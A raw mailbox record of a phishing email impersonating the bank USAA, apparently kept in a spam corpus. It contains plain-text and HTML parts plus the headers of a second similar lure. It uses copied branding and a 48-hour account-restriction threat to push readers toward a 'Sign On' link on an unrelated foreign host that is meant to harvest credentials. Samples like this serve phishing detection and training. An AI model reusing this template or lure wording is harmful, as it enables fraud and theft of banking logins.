From: USAA <jpoohhn.securityussainfo@ubagroup.com>
Date: Sat, 05 Dec 2015 19:29:09 -0500
Status: O
X-Status: 
X-Keywords:                  
X-UID: 275

You will not see this in a MIME-aware mail reader.
--===============1114253671==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 =

   To ensure delivery to your inbox, please add USAA.Web.Services@customerm=
ail.usaa.com to your address book.	 =

 =

   	  =

   =

  	  =

   Account Information Update
  View Accounts | Privacy Promise | Contact Us
	  =

    =

   	 =

  	 =

  	 =

	  =

   USAA SECURITY ZONE =

Account
Update =

USAA # =

	  =

   =

  =

  =

   =

  =

 =

    =

   Dear Customer,

We've posted a new security safeguarde for you on usaa.com. To protect you =
and your financial information, It is now mandatory that you sign in to you=
r account with in 48 hours to update and confirm your personal information =
so you can enjoy the usage of your USAA account and to avoid your account r=
escricted.
 =

Please use the sign in button below to sign in to your account and update y=
our personal information. Also keep your e-mail address updated so you can =
continue to receive notification of new messages from USAA.
 =

   	 Sign On =

 We value your business and the opportunity to serve all your financial nee=
ds.

Thank you,
USAA

	  =

  =

  =

	 	 =

  	 	 	 =

   =

  Privacy Promise
Please do not reply to this e-mail. To contact USAA, visit our secure conta=
ct page.
9800 Fredericksburg Road, San Antonio, TX 78288-9876

  =

  	 =

  =

  =

 =20
--===============1114253671==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD height=3D35 vAlign=3Dmiddle background=3Dhttps://content.usaa.com/mcont=
ent/static_assets/Media/email_emailbar_bg.gif width=3D650 align=3Dcenter><F=
ONT style=3D"FONT-SIZE: 9px; COLOR: #929292" face=3D"Verdana, sans-serif">T=
o ensure delivery to your inbox, please add <SPAN style=3D"COLOR: #68a7c5">=
<A href=3D"mailto:USAA.Web.Services@customermail.usaa.com">USAA.Web.Service=
s@customermail.usaa.com</A></SPAN> to your address book.</FONT></TD>
<TD></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D650 bgColor=3D#b5d7e6 border=
=3D0>
<TBODY>
<TR>
<TD width=3D10></TD>
<TD bgColor=3Dwhite width=3D630 align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D604 border=3D0>
<TBODY>
<TR>
<TD height=3D5 colSpan=3D4></TD></TR>
<TR>
<TD height=3D45 width=3D54><A href=3D"https://www.usaa.com/inet/ent_logon/L=
ogon?EID=3D66662-0711_head" target=3D_blank><IMG border=3D0 alt=3D"" src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_logo.gif" widt=
h=3D61 height=3D41></A></TD>
<TD>
<TABLE cellSpacing=3D0 cellPadding=3D0 border=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: #6d6d6d; FONT: bold 16px Arial, sans-serif" height=3D22=
 align=3Dleft><SPAN style=3D"MARGIN-TOP: 9px; DISPLAY: block">Account Infor=
mation Update</SPAN></TD></TR>
<TR>
<TD height=3D23 noWrap align=3Dleft><NOBR><FONT size=3D1 face=3D"Verdana, s=
ans-serif"><A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"https=
://www.usaa.com/inet/ent_home/CpHome?EID=3D66662-0711_head" target=3D_blank=
>View Accounts</A> | <A style=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" hre=
f=3D"https://www.usaa.com/inet/ent_utils/McStaticPages?key=3Dprivacy_promis=
e&amp;EID=3D66662-0711_head" target=3D_blank>Privacy Promise</A> | <A style=
=3D"TEXT-DECORATION: none; COLOR: #6d6d6d" href=3D"https://www.usaa.com/ine=
t/ent_contactus/CpLevelZeroContactUs?ContactUsPageId=3DPublicContactUs&amp;=
EID=3D66662-0711_head" target=3D_blank>Contact Us</A></FONT></NOBR></TD></T=
R></TBODY></TABLE></TD>
<TD height=3D45 vAlign=3Dmiddle width=3D367 align=3Dright>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D188 border=3D0>
<TBODY>
<TR>
<TD width=3D22>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D22 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_1-1.gif?EID=3D3601803993" width=3D8 hei=
ght=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" width=3D14 h=
eight=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D29 vAlign=3Dtop width=3D8><IMG style=
=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://content.usaa.com/mco=
ntent/static_assets/Media/email_sec_spacer.gif" width=3D8 height=3D29></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D29 vAlign=3Dtop wid=
th=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://co=
ntent.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif" width=3D1=
4 height=3D29></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" height=3D7 vAlign=3Dbottom width=3D8></TD>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D14><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=3D"https://=
content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" width=3D14=
 height=3D7></TD></TR></TBODY></TABLE></TD>
<TD bgColor=3D#e7e7e8 align=3Dleft>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D5 width=3D"100%" border=3D=
0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 9px; TEXT-ALIGN: left; LINE-HEIGHT: 12px; -webkit-t=
ext-size-adjust: none" vAlign=3Dmiddle align=3Dleft><FONT style=3D"FONT-SIZ=
E: 10px; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif"><STRONG>USAA=
 SECURITY ZONE</STRONG></FONT> <BR><FONT style=3D"FONT-SIZE: 9px; COLOR: #0=
0365b" face=3D"Arial, Helvetica, sans-serif">Account</FONT><BR><FONT color=
=3D#00365b face=3DArial>Update</FONT>&nbsp;<BR><FONT style=3D"FONT-SIZE: 9p=
x; COLOR: #00365b" face=3D"Arial, Helvetica, sans-serif">USAA # </FONT></TD=
></TR></TBODY></TABLE></TD>
<TD bgColor=3D#ffffff width=3D7>
<TABLE height=3D65 cellSpacing=3D0 cellPadding=3D0 width=3D7 border=3D0>
<TBODY>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dtop widt=
h=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif=
" width=3D7 height=3D7></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D51 vAlign=3Dtop wid=
th=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" src=
=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.=
gif" width=3D7 height=3D51></TD></TR>
<TR>
<TD style=3D"LINE-HEIGHT: 0" bgColor=3D#e7e7e8 height=3D7 vAlign=3Dbottom w=
idth=3D7 align=3Dright><IMG style=3D"DISPLAY: block" border=3D0 alt=3D"" sr=
c=3D"https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gi=
f" width=3D7 height=3D7></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE=
></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD height=3D1 colSpan=3D4></TD></TR></TBODY></TABLE>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"95%" border=3D0>
<TBODY>
<TR>
<TD height=3D20 colSpan=3D2>&nbsp;</TD></TR>
<TR>
<TD width=3D"95%" align=3Dleft>
<P><FONT style=3D"FONT-SIZE: 12px; COLOR: #333333; LINE-HEIGHT: 18px" face=
=3D"Verdana, sans-serif">Dear Customer,<BR><BR>We've posted a new&nbsp;secu=
rity safeguarde&nbsp;for you on usaa.com. To protect you and your financial=
 information, It is now mandatory that you sign in to your account with in =
48 hours to update and confirm your personal information so you can enjoy t=
he usage of your USAA account and to avoid your account rescricted.</FONT><=
/P>
<P><FONT color=3D#333333 face=3DVerdana></FONT><FONT style=3D"FONT-SIZE: 12=
px; COLOR: #333333; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif"><BR>Ple=
ase use the sign in button below to sign in to your account and update your=
 personal information. Also keep your e-mail address updated so you can con=
tinue to receive notification of new messages from USAA.</FONT><FONT style=
=3D"FONT-SIZE: 12px; COLOR: #333333; LINE-HEIGHT: 18px" face=3D"Verdana, sa=
ns-serif"></P>
<TABLE style=3D"BACKGROUND: url(https://content.usaa.com/mcontent/static_as=
sets/Media/email_change_pref_bg.gif) no-repeat left top" height=3D15 cellSp=
acing=3D0 cellPadding=3D0 bgColor=3D#6cae35 border=3D0>
<TBODY>
<TR bgColor=3D#6cae35>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D15 align=3Dcenter><IMG src=3D=
"https://content.usaa.com/mcontent/static_assets/Media/email_cta_arrow.gif"=
 width=3D15 height=3D15></TD>
<TD bgColor=3D#6cae35 vAlign=3Dmiddle width=3D134 align=3Dcenter><A style=
=3D"TEXT-DECORATION: none; COLOR: #fff; FONT: bold 11px arial, sans-serif" =
href=3D"http://www.uniware.in/admin/images/good.htm" target=3D_blank>Sign O=
n </A></TD></TR></TBODY></TABLE>
<P>We value your business and the opportunity to serve all your financial n=
eeds.<BR><BR>Thank you,<BR>USAA<BR></FONT></P></TD>
<TD>&nbsp;</TD></TR>
<TR>
<TD height=3D30 colSpan=3D2 align=3Dleft><BR><A href=3D"http://www.facebook=
.com/USAA?EID=3D66662-0711_body" target=3D_blank><IMG border=3D0 alt=3DFace=
book src=3D"http://content.usaa.com/mcontent/static_assets/om/Media/thumbna=
ils/facebookIcon.gif" width=3D32 height=3D32></A>&nbsp;&nbsp;<A href=3D"htt=
p://twitter.com/usaa?EID=3D66662-0711_body" target=3D_blank><IMG border=3D0=
 alt=3DTwitter src=3D"http://content.usaa.com/mcontent/static_assets/om/Med=
ia/thumbnails/twitterIcon.gif" width=3D32 height=3D32></A></TD></TR></TBODY=
></TABLE></TD>
<TD background=3Dhttps://content.usaa.com/mcontent/static_assets/Media/emai=
l_vertical-ds.gif width=3D5></TD>
<TD width=3D5></TD></TR>
<TR>
<TD height=3D5 width=3D10></TD>
<TD height=3D5 background=3Dhttps://content.usaa.com/mcontent/static_assets=
/Media/email_horizontal-ds.gif width=3D630></TD>
<TD height=3D5 width=3D5><IMG border=3D0 alt=3D"" src=3D"https://content.us=
aa.com/mcontent/static_assets/Media/email_corner-ds.gif" width=3D5 height=
=3D5></TD>
<TD height=3D5 width=3D5></TD></TR>
<TR>
<TD height=3D20 colSpan=3D4>&nbsp;</TD></TR>
<TR>
<TD colSpan=3D4 align=3Dcenter><FONT style=3D"FONT-SIZE: 10px; COLOR: #6d6d=
6d; LINE-HEIGHT: 18px" face=3D"Verdana, sans-serif"><A href=3D"https://www.=
usaa.com/inet/pages/privacy_promise?EID=3D66662-0711_foot" target=3D_blank>=
Privacy Promise</A><BR>Please do not reply to this e-mail. To contact USAA,=
 visit our secure <A href=3D"https://www.usaa.com/inet/ent_references/CpSen=
dUsAMessage?ContentArea=3Dcp&amp;EID=3D66662-0711_foot" target=3D_blank>con=
tact page</A>.<BR>9800 Fredericksburg Road, San Antonio, TX 78288-9876<BR><=
/FONT></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD width=3D5 align=3Dleft></TD>
<TD width=3D5 align=3Dleft></TD></TR>
<TR>
<TD height=3D15 width=3D10></TD></TR>
<TR>
<TD colSpan=3D4 align=3Dright></TD></TR></TBODY>
<DIV></DIV>
<DIV></DIV></DIV></BODY></HTML>
--===============1114253671==--

From jose@monkey.org Sun Dec  6 02:29:16 2015 +0000
Return-Path: usaa.protectionsupport@usaaa.com
Delivered-To: jose@monkey.org
X-FDA: 70931457912.20.fifth74_86b85994d1631
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 30,2,0,58b9e70b65a77700,d41d8cd98f00b204,usaa.protectionsupport@usaaa.com,:usaa.protectionsupport@usaaa.com,RULES_HIT:41:355:379:581:871:988:989:1260:1261:1313:1314:1345:1381:1516:1518:1523:1536:1569:1575:1594:1711:1714:1730:1747:1764:1777:1792:2084:2392:2393:2559:2562:3138:3139:3140:3141:3142:3876:3877:5007:6114:6264:6618:6642:6687:6748:7281:7398:10004:10231:10400:11604:11658:11914:12166:12196:12340:12561:13110:21080:30001:30026:30054:30055:30070,0,RBL:189.56.120.219:@usaaa.com:.lbl8.mailshell.net-62.8.4.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:19,LUA_SUMMARY:none
X-HE-Tag: fifth74_86b85994d1631
X-Filterd-Recvd-Size: 61150
Received: from SERVER-UTILRENT.UTILRENT.LOCAL (unknown [189.56.120.219])
	by imf30.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Sun,  6 Dec 2015 02:28:35 +0000 (UTC)
Received: from SERVER-UTILRENT.UTILRENT.LOCAL ([127.0.0.1]) by SERVER-UTILRENT.UTILRENT.LOCAL with Microsoft SMTPSVC(7.0.6001.18000);
	 Sat, 5 Dec 2015 22:52:17 -0200
Content-Type: multipart/mixed; boundary="===============1045402179=="
MIME-Version: 1.0
Subject: Your USAA Checking Account Untrusted Authorization
To: Recipients <USAA.protectionsupport@usaaa.com>
